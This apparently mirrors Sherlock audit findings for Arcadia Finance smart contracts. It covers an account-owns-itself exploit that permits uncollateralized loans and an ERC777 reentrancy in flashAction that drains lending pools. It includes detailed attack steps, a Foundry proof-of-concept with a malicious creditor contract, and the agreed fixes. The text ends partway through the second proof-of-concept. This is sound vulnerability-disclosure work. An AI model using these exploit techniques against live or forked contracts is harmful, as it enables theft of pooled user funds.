GithubHelp home page GithubHelp logo

2023-12-arcadia-judging's Introduction

Issue H-1: AccountV1#flashActionByCreditor can be used to drain assets from account without withdrawing

Source: #140

Found by

0x52

Summary

AccountV1#flashActionByCreditor is designed to allow atomic flash actions moving funds from the owner of the account. By making the account own itself, these arbitrary calls can be used to transfer ERC721 assets directly out of the account. The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.

Vulnerability Detail

The overview of the exploit are as follows:

1) Deposit ERC721
2) Set creditor to malicious designed creditor
3) Transfer the account to itself
4) flashActionByCreditor to transfer ERC721
    4a) account owns itself so _transferFromOwner allows transfers from account
    4b) Account is now empty but still thinks is has ERC721
5) Use malicious designed liquidator contract to call auctionBoughtIn
    and transfer account back to attacker
7) Update creditor to legitimate creditor
8) Take out loan against nothing
9) Profit

The key to this exploit is that the account is able to be it's own owner. Paired with a maliciously designed creditor (creditor can be set to anything) flashActionByCreditor can be called by the attacker when this is the case.

AccountV1.sol#L770-L772

if (transferFromOwnerData.assets.length > 0) {
    _transferFromOwner(transferFromOwnerData, actionTarget);
}

In these lines the ERC721 token is transferred out of the account. The issue is that even though the token is transferred out, the erc721Stored array is not updated to reflect this change.

AccountV1.sol#L570-L572

function auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {
    _transferOwnership(recipient);
}

As seen above auctionBoughtIn does not have any requirement besides being called by the liquidator. Since the liquidator is also malicious. It can then abuse this function to set the owner to any address, which allows the attacker to recover ownership of the account. Now the attacker has an account that still considers the ERC721 token as owned but that token isn't actually present in the account.

Now the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.

Impact

Account can take out completely uncollateralized loans, causing massive losses to all lending pools.

Code Snippet

AccountV1.sol#L265-L270

Tool used

Manual Review

Recommendation

The root cause of this issue is that the account can own itself. The fix is simple, make the account unable to own itself by causing transferOwnership to revert if owner == address(this)

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: flashActionByCreditor should be mitigated; high(7)

j-vp

Created a (very) quick & dirty POC to confirm the validity:

/**
 * Created by Pragma Labs
 * SPDX-License-Identifier: MIT
 */
pragma solidity 0.8.22;

import { Fork_Test } from "../Fork.t.sol";

import { ERC20 } from "../../../lib/solmate/src/tokens/ERC20.sol";
import { ERC721 } from "../../../lib/solmate/src/tokens/ERC721.sol";

import { LiquidityAmounts } from "../../../src/asset-modules/UniswapV3/libraries/LiquidityAmounts.sol";
import { LiquidityAmountsExtension } from
    "../../utils/fixtures/uniswap-v3/extensions/libraries/LiquidityAmountsExtension.sol";
import { INonfungiblePositionManagerExtension } from
    "../../utils/fixtures/uniswap-v3/extensions/interfaces/INonfungiblePositionManagerExtension.sol";
import { ISwapRouter } from "../../utils/fixtures/uniswap-v3/extensions/interfaces/ISwapRouter.sol";
import { IUniswapV3Factory } from "../../utils/fixtures/uniswap-v3/extensions/interfaces/IUniswapV3Factory.sol";
import { IUniswapV3PoolExtension } from
    "../../utils/fixtures/uniswap-v3/extensions/interfaces/IUniswapV3PoolExtension.sol";
import { TickMath } from "../../../src/asset-modules/UniswapV3/libraries/TickMath.sol";
import { UniswapV3AM } from "../../../src/asset-modules/UniswapV3/UniswapV3AM.sol";
import { ActionData } from "../../../src/interfaces/IActionBase.sol";
import { IPermit2 } from "../../../src/interfaces/IPermit2.sol";
import { AccountV1 } from "../../../src/accounts/AccountV1.sol";

/**
 * @notice Fork tests for "UniswapV3AM" to test issue 140.
 */
contract UniswapV3AM_Fork_Test is Fork_Test {
    /*///////////////////////////////////////////////////////////////
                            CONSTANTS
    ///////////////////////////////////////////////////////////////*/
    INonfungiblePositionManagerExtension internal constant NONFUNGIBLE_POSITION_MANAGER =
        INonfungiblePositionManagerExtension(0x03a520b32C04BF3bEEf7BEb72E919cf822Ed34f1);
    ISwapRouter internal constant SWAP_ROUTER = ISwapRouter(0x2626664c2603336E57B271c5C0b26F421741e481);
    IUniswapV3Factory internal constant UNISWAP_V3_FACTORY =
        IUniswapV3Factory(0x33128a8fC17869897dcE68Ed026d694621f6FDfD);

    /*///////////////////////////////////////////////////////////////
                            TEST CONTRACTS
    ///////////////////////////////////////////////////////////////*/

    UniswapV3AM internal uniV3AM_;
    MaliciousCreditor internal maliciousCreditor;

    /*///////////////////////////////////////////////////////////////
                            SET-UP FUNCTION
    ///////////////////////////////////////////////////////////////*/

    function setUp() public override {
        Fork_Test.setUp();

        // Deploy uniV3AM_.
        vm.startPrank(users.creatorAddress);
        uniV3AM_ = new UniswapV3AM(address(registryExtension), address(NONFUNGIBLE_POSITION_MANAGER));
        registryExtension.addAssetModule(address(uniV3AM_));
        uniV3AM_.setProtocol();
        vm.stopPrank();

        vm.label({ account: address(uniV3AM_), newLabel: "Uniswap V3 Asset Module" });

        maliciousCreditor = new MaliciousCreditor(users.creatorAddress);
        vm.startPrank(users.creatorAddress);
        registryExtension.setRiskParametersOfPrimaryAsset(
            address(maliciousCreditor), address(DAI), 0, type(uint112).max, 9000, 9500
        );
        registryExtension.setRiskParametersOfPrimaryAsset(
            address(maliciousCreditor), address(USDC), 0, type(uint112).max, 9000, 9500
        );
        registryExtension.setRiskParametersOfPrimaryAsset(
            address(maliciousCreditor), address(WETH), 0, type(uint112).max, 9000, 9500
        );
        registryExtension.setRiskParametersOfDerivedAM(
            address(maliciousCreditor), address(uniV3AM_), type(uint112).max, 10_000
        );
        registryExtension.setRiskParameters(address(maliciousCreditor), 0, 0, 10);
        vm.stopPrank();
    }

    /*////////////////////////////////////////////////////////////////
                        HELPER FUNCTIONS
    ////////////////////////////////////////////////////////////////*/
    function isWithinAllowedRange(int24 tick) public pure returns (bool) {
        int24 MIN_TICK = -887_272;
        int24 MAX_TICK = -MIN_TICK;
        return (tick < 0 ? uint256(-int256(tick)) : uint256(int256(tick))) <= uint256(uint24(MAX_TICK));
    }

    function addLiquidity(
        IUniswapV3PoolExtension pool,
        uint128 liquidity,
        address liquidityProvider_,
        int24 tickLower,
        int24 tickUpper,
        bool revertsOnZeroLiquidity
    ) public returns (uint256 tokenId) {
        (uint160 sqrtPrice,,,,,,) = pool.slot0();

        (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(
            sqrtPrice, TickMath.getSqrtRatioAtTick(tickLower), TickMath.getSqrtRatioAtTick(tickUpper), liquidity
        );

        tokenId = addLiquidity(pool, amount0, amount1, liquidityProvider_, tickLower, tickUpper, revertsOnZeroLiquidity);
    }

    function addLiquidity(
        IUniswapV3PoolExtension pool,
        uint256 amount0,
        uint256 amount1,
        address liquidityProvider_,
        int24 tickLower,
        int24 tickUpper,
        bool revertsOnZeroLiquidity
    ) public returns (uint256 tokenId) {
        // Check if test should revert or be skipped when liquidity is zero.
        // This is hard to check with assumes of the fuzzed inputs due to rounding errors.
        if (!revertsOnZeroLiquidity) {
            (uint160 sqrtPrice,,,,,,) = pool.slot0();
            uint256 liquidity = LiquidityAmountsExtension.getLiquidityForAmounts(
                sqrtPrice,
                TickMath.getSqrtRatioAtTick(tickLower),
                TickMath.getSqrtRatioAtTick(tickUpper),
                amount0,
                amount1
            );
            vm.assume(liquidity > 0);
        }

        address token0 = pool.token0();
        address token1 = pool.token1();
        uint24 fee = pool.fee();

        deal(token0, liquidityProvider_, amount0);
        deal(token1, liquidityProvider_, amount1);
        vm.startPrank(liquidityProvider_);
        ERC20(token0).approve(address(NONFUNGIBLE_POSITION_MANAGER), type(uint256).max);
        ERC20(token1).approve(address(NONFUNGIBLE_POSITION_MANAGER), type(uint256).max);
        (tokenId,,,) = NONFUNGIBLE_POSITION_MANAGER.mint(
            INonfungiblePositionManagerExtension.MintParams({
                token0: token0,
                token1: token1,
                fee: fee,
                tickLower: tickLower,
                tickUpper: tickUpper,
                amount0Desired: amount0,
                amount1Desired: amount1,
                amount0Min: 0,
                amount1Min: 0,
                recipient: liquidityProvider_,
                deadline: type(uint256).max
            })
        );
        vm.stopPrank();
    }

    function assertInRange(uint256 actualValue, uint256 expectedValue, uint8 precision) internal {
        if (expectedValue == 0) {
            assertEq(actualValue, expectedValue);
        } else {
            vm.assume(expectedValue > 10 ** (2 * precision));
            assertGe(actualValue * (10 ** precision + 1) / 10 ** precision, expectedValue);
            assertLe(actualValue * (10 ** precision - 1) / 10 ** precision, expectedValue);
        }
    }

    /*///////////////////////////////////////////////////////////////
                            FORK TESTS
    ///////////////////////////////////////////////////////////////*/

    function testFork_Success_deposit2(uint128 liquidity, int24 tickLower, int24 tickUpper) public {
        vm.assume(liquidity > 10_000);

        IUniswapV3PoolExtension pool =
            IUniswapV3PoolExtension(UNISWAP_V3_FACTORY.getPool(address(DAI), address(WETH), 100));
        (, int24 tickCurrent,,,,,) = pool.slot0();

        // Check that ticks are within allowed ranges.
        tickLower = int24(bound(tickLower, tickCurrent - 16_095, tickCurrent + 16_095));
        tickUpper = int24(bound(tickUpper, tickCurrent - 16_095, tickCurrent + 16_095));
        // Ensure Tick is correctly spaced.
        {
            int24 tickSpacing = UNISWAP_V3_FACTORY.feeAmountTickSpacing(pool.fee());
            tickLower = tickLower / tickSpacing * tickSpacing;
            tickUpper = tickUpper / tickSpacing * tickSpacing;
        }
        vm.assume(tickLower < tickUpper);
        vm.assume(isWithinAllowedRange(tickLower));
        vm.assume(isWithinAllowedRange(tickUpper));

        // Check that Liquidity is within allowed ranges.
        vm.assume(liquidity <= pool.maxLiquidityPerTick());

        // Balance pool before mint
        uint256 amountDaiBefore = DAI.balanceOf(address(pool));
        uint256 amountWethBefore = WETH.balanceOf(address(pool));

        // Mint liquidity position.
        uint256 tokenId = addLiquidity(pool, liquidity, users.accountOwner, tickLower, tickUpper, false);

        // Balance pool after mint
        uint256 amountDaiAfter = DAI.balanceOf(address(pool));
        uint256 amountWethAfter = WETH.balanceOf(address(pool));

        // Amounts deposited in the pool.
        uint256 amountDai = amountDaiAfter - amountDaiBefore;
        uint256 amountWeth = amountWethAfter - amountWethBefore;

        // Precision oracles up to % -> need to deposit at least 1000 tokens or rounding errors lead to bigger errors.
        vm.assume(amountDai + amountWeth > 100);

        // Deposit the Liquidity Position.
        {
            address[] memory assetAddress = new address[](1);
            assetAddress[0] = address(NONFUNGIBLE_POSITION_MANAGER);

            uint256[] memory assetId = new uint256[](1);
            assetId[0] = tokenId;

            uint256[] memory assetAmount = new uint256[](1);
            assetAmount[0] = 1;
            vm.startPrank(users.accountOwner);
            ERC721(address(NONFUNGIBLE_POSITION_MANAGER)).approve(address(proxyAccount), tokenId);
            proxyAccount.deposit(assetAddress, assetId, assetAmount);
            vm.stopPrank();
        }

        vm.startPrank(users.accountOwner);
        // exploit starts: user adds malicious creditor to keep the "hook" after the account transfer
        proxyAccount.openMarginAccount(address(maliciousCreditor));

        // avoid any cooldowns
        uint256 time = block.timestamp;
        vm.warp(time + 1 days);

        // transfer the account to itself
        factory.safeTransferFrom(users.accountOwner, address(proxyAccount), address(proxyAccount));
        vm.stopPrank();
        assertEq(proxyAccount.owner(), address(proxyAccount));

        vm.startPrank(users.creatorAddress);

        // from the malicous creditor set earlier, start a flashActionByCreditor which withdraws the univ3lp as a "transferFromOwner"
        maliciousCreditor.doFlashActionByCreditor(address(proxyAccount), tokenId, address(NONFUNGIBLE_POSITION_MANAGER));
        vm.stopPrank();

        // univ3lp changed ownership to the malicious creditor
        assertEq(ERC721(address(NONFUNGIBLE_POSITION_MANAGER)).ownerOf(tokenId), address(maliciousCreditor));
        assertEq(ERC721(address(NONFUNGIBLE_POSITION_MANAGER)).balanceOf(address(proxyAccount)), 0);

        // account still shows it has a collateral value
        assertGt(proxyAccount.getCollateralValue(), 0);

        // univ3lp is still accounted for in the account
        (address[] memory assets, uint256[] memory ids, uint256[] memory amounts) = proxyAccount.generateAssetData();
        assertEq(assets[0], address(NONFUNGIBLE_POSITION_MANAGER));
        assertEq(ids[0], tokenId);
        assertEq(amounts[0], 1);
    }
}

contract MaliciousCreditor {
    address public riskManager;

    constructor(address riskManager_) {
        // Set the risk manager.
        riskManager = riskManager_;
    }

    function openMarginAccount(uint256 version)
        public
        returns (bool success, address numeraire_, address liquidator_, uint256 minimumMargin_)
    {
        return (true, 0x50c5725949A6F0c72E6C4a641F24049A917DB0Cb, address(0), 0); //dai
    }

    function doFlashActionByCreditor(address targetAccount, uint256 tokenId, address nftMgr) public {
        ActionData memory withdrawData;
        IPermit2.PermitBatchTransferFrom memory permit;
        bytes memory signature;
        bytes memory actionTargetData;

        ActionData memory transferFromOwnerData;
        transferFromOwnerData.assets = new address[](1);
        transferFromOwnerData.assets[0] = nftMgr;
        transferFromOwnerData.assetIds = new uint256[](1);
        transferFromOwnerData.assetIds[0] = tokenId;
        transferFromOwnerData.assetAmounts = new uint256[](1);
        transferFromOwnerData.assetAmounts[0] = 1;
        transferFromOwnerData.assetTypes = new uint256[](1);
        transferFromOwnerData.assetTypes[0] = 1;

        bytes memory actionData = abi.encode(withdrawData, transferFromOwnerData, permit, signature, actionTargetData);

        AccountV1(targetAccount).flashActionByCreditor(address(this), actionData);
    }

    function executeAction(bytes memory actionData) public returns (ActionData memory) {
        ActionData memory withdrawData;
        return withdrawData;
    }

    function getOpenPosition(address) public pure returns (uint256) {
        return 0;
    }

    function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {
        return this.onERC721Received.selector;
    }
}

j-vp

I don't see a reasonable usecase where an account should own itself. wdyt @Thomas-Smets ?

function transferOwnership(address newOwner) external onlyFactory notDuringAuction {
    if (block.timestamp <= lastActionTimestamp + COOL_DOWN_PERIOD) revert AccountErrors.CoolDownPeriodNotPassed();

    // The Factory will check that the new owner is not address(0).
+   if (newOwner == address(this)) revert NoTransferToSelf();
    owner = newOwner;
}

function _transferOwnership(address newOwner) internal {
    // The Factory will check that the new owner is not address(0).
+   if (newOwner == address(this)) revert NoTransferToSelf();
    owner = newOwner;
    IFactory(FACTORY).safeTransferAccount(newOwner);
}

Thomas-Smets

No indeed, that should fix it

Thomas-Smets

Fixes:

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#171.

IAm0x52

Fix looks good. Accounts can no longer own themselves as all transfers of ownership to self are now blocked.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue H-2: Reentrancy in flashAction() allows draining liquidity pools

Source: #153

Found by

0xadrii, zzykxx

Summary

It is possible to drain a liquidity pool/creditor if the pool’s asset is an ERC777 token by triggering a reentrancy flow using flash actions.

Vulnerability Detail

The following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:

  • Flash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. The following steps summarize what actually happens when LendingPool.flashAction() flow is triggered:

    1. The amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole flashAction() execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.
    2. Borrowed asset will be transferred to the actionTarget. The actionTarget is an arbitrary address passed as parameter in the flashAction(). It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling flashActionByCreditor(), which is the function that will end up verifying the account’s health state. This is the step where the reentrancy will be triggered by the actionTarget.
    3. The account’s flashActionByCreditor() function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).
    // LendingPool.sol
    
    function flashAction(
            uint256 amountBorrowed,
            address account,
            address actionTarget, 
            bytes calldata actionData,
            bytes3 referrer
        ) external whenBorrowNotPaused processInterests {
            ... 
    
            uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);
    
            ...
     
            // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.
            _deposit(amountBorrowedWithFee, account);
    
            ...
    
            // Send Borrowed funds to the actionTarget.
            asset.safeTransfer(actionTarget, amountBorrowed);
     
            // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)
            // to execute one or more actions (swap, deposit, mint...).
            // Next the action Target will deposit any of the remaining funds or any of the recipient token
            // resulting from the actions back into the Account.
            // As last step, after all assets are deposited back into the Account a final health check is done:
            // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).
            // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.
            {
                uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);
                if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();
            }
     
            ... 
        }
  • Collateral value: Each creditor is configured with some risk parameters in the Registry contract. One of the risk parameters is the minUsdValue, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the minUsdValue, it will simply be accounted with a value of 0. For example: if the minUsdValue configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let’s say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing at the eyes of the creditor. However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the minUsdValue. Now, the creditor will consider our account’s collateral to be worth 100 USD instead of 0 USD.

  • Liquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via Liquidator.liquidateAccount() all the information regarding the debt and assets from the account will be stored in auctionInformation_ , which maps account addresses to an AuctionInformation struct. An important field in this struct is the assetShares, which will store the relative value of each asset, with respect to the total value of the Account.

    When a user wants to bid for an account in liquidation, the Liquidator.bid() function must be called. An important feature from this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount wants to obtain back, and the contract will compute the amount of debt required to be repaid from the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.

With this background, we can now move on to describing the vulnerability in full.

Initially, we will create an account and deposit collateral whose value is in the limit of the configured minUsdValue (if the minUsdValue is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account’s collateral and debt status will look like this:

vuln1

The next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the actionTarget (this will be a contract we create and control). An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our actionTarget contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account’s status would look like this:

vuln2

On receiving the borrowed tokens, the actual attack will begin. TheactionTarget will trigger the Liquidator.liquidateAccount() function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account’s collateral value) prior to executing the actionTarget ERC777 callback, making the account susceptible of being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the auctionInformation_ mapping.

After finishing the liquidateAccount() execution, the next step for the actionTarget is to place a bid for our own account auction calling Liquidator.bid(). The trick here is to request a small amount from the account’s collateral in the askedAssetAmounts array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the computed price to pay for the bid by _calculateBidPrice() be really small so that we can maximize our gains. Another requirement will be to set the endAuction_ parameter to true (we will see why later):

// Liquidator.sol

function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {
        AuctionInformation storage auctionInformation_ = auctionInformation[account];
        if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();

        // Calculate the current auction price of the assets being bought.
        uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);
        uint256 price = _calculateBidPrice(auctionInformation_, totalShare);
				
				// Transfer an amount of "price" in "Numeraire" to the LendingPool to repay the Accounts debt.
        // The LendingPool will call a "transferFrom" from the bidder to the pool -> the bidder must approve the LendingPool.
        // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.
        uint128 startDebt = auctionInformation_.startDebt;
        bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(
            startDebt, auctionInformation_.minimumMargin, price, account, msg.sender
        );
		...
}

After computing the small price to pay for the bid, theLendingPool.auctionRepay() will be called. Because we are repaying a really small amount from the debt, the accountDebt <= amount condition will NOT hold, so the only actions performed by LendingPool.auctionRepay() will be transferring the small amount of tokens to pay the bid, and _withdraw() (burn) the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). It is also important to note that the earlyTerminate flag will remain as false:

// LendingPool.sol

function auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)
        external
        whenLiquidationNotPaused
        onlyLiquidator 
        processInterests
        returns (bool earlyTerminate)
    {
        // Need to transfer before burning debt or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(bidder, address(this), amount);

        uint256 accountDebt = maxWithdraw(account); 
        if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();
        if (accountDebt <= amount) {
            // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.
            // -> Terminate the auction and make the surplus available to the Account-Owner.
            earlyTerminate = true;
            unchecked {
                _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));
            }
            amount = accountDebt;
        }
  
        _withdraw(amount, address(this), account); 

        emit Repay(account, bidder, amount);
    }

After LendingPool.auctionRepay() , execution will go back to Liquidator.bid(). The account’s auctionBid() function will then be called, which will transfer the 1 token requested by the bidder in the askedAssetAmounts parameter from the account’s collateral to the bidder. This is the most important concept in the attack. Because 1 token is moving out from the account’s collateral, the current collateral value from the account will be decreased from 100 USD to 99 USD, making the collateral value be under the minimum minUsdValue amount of 100 USD, and thus making the collateral value from the account go straight to 0 at the eyes of the creditor:

vuln3

Because the earlyTerminate was NOT set to true in LendingPool.auctionRepay(), the if (earlyTerminate) condition will be skipped, going straight to evaluate the else if (endAuction_) condition . Because we set theendAuction_ parameter to true when calling the bid() function, _settleAuction() will execute.

// Liquidator.sol

function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {
        ...
				
				// Transfer the assets to the bidder.
        IAccount(account).auctionBid(
            auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender
        );
        // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.
        if (earlyTerminate) {
            // Stop the auction, no need to do a health check for the account since it has no debt anymore.
            _endAuction(account);
        }
        // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction
        // if one of the conditions to end the auction is met.
        // "_endAuction()" will silently fail without reverting, if the auction was not successfully ended.
        else if (endAuction_) {
            if (_settleAuction(account, auctionInformation_)) _endAuction(account);
        } 
    }

_settleAuction() is where the final steps of the attack will take place. Because we made the collateral value of our account purposely decrease from the minUsdValue, _settleAuction will interpret that all collateral has been sold, and the else if (collateralValue == 0) will evaluate to true, making the creditor’s settleLiquidationUnhappyFlow() function be called:

function _settleAuction(address account, AuctionInformation storage auctionInformation_)
        internal
        returns (bool success)
    {
        // Cache variables.
        uint256 startDebt = auctionInformation_.startDebt;
        address creditor = auctionInformation_.creditor;
        uint96 minimumMargin = auctionInformation_.minimumMargin;

        uint256 collateralValue = IAccount(account).getCollateralValue();
        uint256 usedMargin = IAccount(account).getUsedMargin();
 
        // Check the different conditions to end the auction.
        if (collateralValue >= usedMargin || usedMargin == minimumMargin) { 
            // Happy flow: Account is back in a healthy state.
            // An Account is healthy if the collateral value is equal or greater than the used margin.
            // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.
            ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);
        } else if (collateralValue == 0) {
            // Unhappy flow: All collateral is sold.
            ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);
        }
				...
				 
				
        return true;
    }

Executing the settleLiquidationUnhappyFlow() will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling _endLiquidation() and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the actionTarget with ALL the borrowed funds taken from the flash action).

// LendingPool.sol

function settleLiquidationUnhappyFlow(
        address account,
        uint256 startDebt,
        uint256 minimumMargin_,
        address terminator
    ) external whenLiquidationNotPaused onlyLiquidator processInterests {
        ...

        // Any remaining debt that was not recovered during the auction must be written off.
        // Depending on the size of the remaining debt, different stakeholders will be impacted.
        uint256 debtShares = balanceOf[account];
        uint256 openDebt = convertToAssets(debtShares);
        uint256 badDebt;
        ...

        // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.
        _burn(account, debtShares);
        realisedDebt -= openDebt;
        emit Withdraw(msg.sender, account, account, openDebt, debtShares);

        _endLiquidation();

        emit AuctionFinished(
            account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0
        );
    }

After the actionTarget's ERC777 callback execution, the execution flow will return to the initially called flashAction() function, and the final IAccount(account).flashActionByCreditor() function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:

// LendingPool.sol

function flashAction(
        uint256 amountBorrowed,
        address account,
        address actionTarget, 
        bytes calldata actionData,
        bytes3 referrer
    ) external whenBorrowNotPaused processInterests {
        
				... 
 
        // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)
        // to execute one or more actions (swap, deposit, mint...).
        // Next the action Target will deposit any of the remaining funds or any of the recipient token
        // resulting from the actions back into the Account.
        // As last step, after all assets are deposited back into the Account a final health check is done:
        // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).
        // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.
        {
            uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);
            if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();
        }
 
        ... 
    }
// AccountV1.sol

function flashActionByCreditor(address actionTarget, bytes calldata actionData)
        external
        nonReentrant
        notDuringAuction
        updateActionTimestamp
        returns (uint256 accountVersion)
    {
        
				...

        // Account must be healthy after actions are executed.
        if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();

        ...
    }

Proof of Concept

The following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:

  1. Create a ERC777Mock.sol file in lib/accounts-v2/test/utils/mocks/tokens and paste the code found in this github gist.

  2. Import the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in lib/accounts-v2/test/utils/Types.sol to add an additional token777ToUsd, token777 of type ERC777Mock and token777ToUsd rate:

    import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this
    
    ...
    
    struct MockOracles {
        ArcadiaOracle stable1ToUsd;
        ArcadiaOracle stable2ToUsd;
        ArcadiaOracle token1ToUsd;
        ArcadiaOracle token2ToUsd;
        ArcadiaOracle token3ToToken4;
        ArcadiaOracle token4ToUsd;
        ArcadiaOracle token777ToUsd; // <----- Add this
        ArcadiaOracle nft1ToToken1;
        ArcadiaOracle nft2ToUsd;
        ArcadiaOracle nft3ToToken1;
        ArcadiaOracle sft1ToToken1;
        ArcadiaOracle sft2ToUsd;
    }
    
    struct MockERC20 {
        ERC20Mock stable1;
        ERC20Mock stable2;
        ERC20Mock token1;
        ERC20Mock token2;
        ERC20Mock token3;
        ERC20Mock token4;
        ERC777Mock token777; // <----- Add this
    }
    
    ...
    
    struct Rates {
        uint256 stable1ToUsd;
        uint256 stable2ToUsd;
        uint256 token1ToUsd;
        uint256 token2ToUsd;
        uint256 token3ToToken4;
        uint256 token4ToUsd;
        uint256 token777ToUsd; // <----- Add this
        uint256 nft1ToToken1;
        uint256 nft2ToUsd;
        uint256 nft3ToToken1;
        uint256 sft1ToToken1;
        uint256 sft2ToUsd;
    }
  3. Replace the contents inside lib/accounts-v2/test/fuzz/Fuzz.t.sol for the code found in this github gist.

  4. To finish the setup, replace the file found in lending-v2/test/fuzz/Fuzz.t.sol for the code found in this github gist.

  5. For the actual proof of concept, create a Poc.t.sol file in test/fuzz/LendingPool and paste the following code. The code contains the proof of concept test, as well as the action target implementation:

    /**
     * Created by Pragma Labs
     * SPDX-License-Identifier: BUSL-1.1
     */
    pragma solidity 0.8.22;
    
    import { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";
    
    import { ActionData, IActionBase } from "../../../lib/accounts-v2/src/interfaces/IActionBase.sol";
    import { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";
    
    /// @notice Proof of Concept - Arcadia
    contract Poc is LendingPool_Fuzz_Test {
    
        /////////////////////////////////////////////////////////////////
        //                        TEST CONTRACTS                       //
        /////////////////////////////////////////////////////////////////
    
        ActionHandler internal actionHandler;
        bytes internal callData;
    
        /////////////////////////////////////////////////////////////////
        //                          SETUP                              //
        /////////////////////////////////////////////////////////////////
    
        function setUp() public override {
            // Setup pool test
            LendingPool_Fuzz_Test.setUp();
    
            // Deploy action handler
            vm.prank(users.creatorAddress);
            actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));
    
            // Set origination fee
            vm.prank(users.creatorAddress);
            pool.setOriginationFee(100); // 1%
    
            // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool 
            vm.startPrank(users.liquidityProvider);
            mockERC20.token777.transfer(address(actionHandler), 1 ether);
            mockERC20.token777.approve(address(pool), type(uint256).max);
    
            // Deposit 100 erc777 tokens into pool
            vm.startPrank(address(srTranche));
            pool.depositInLendingPool(100 ether, users.liquidityProvider);
            assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);
    
            // Approve creditor from actiontarget for bid payment
            vm.startPrank(address(actionHandler));
            mockERC20.token777.approve(address(pool), type(uint256).max);
    
        }
    
        /////////////////////////////////////////////////////////////////
        //                           POC                               //
        /////////////////////////////////////////////////////////////////
        /// @notice Test exploiting the reentrancy vulnerability. 
        /// Prerequisites:
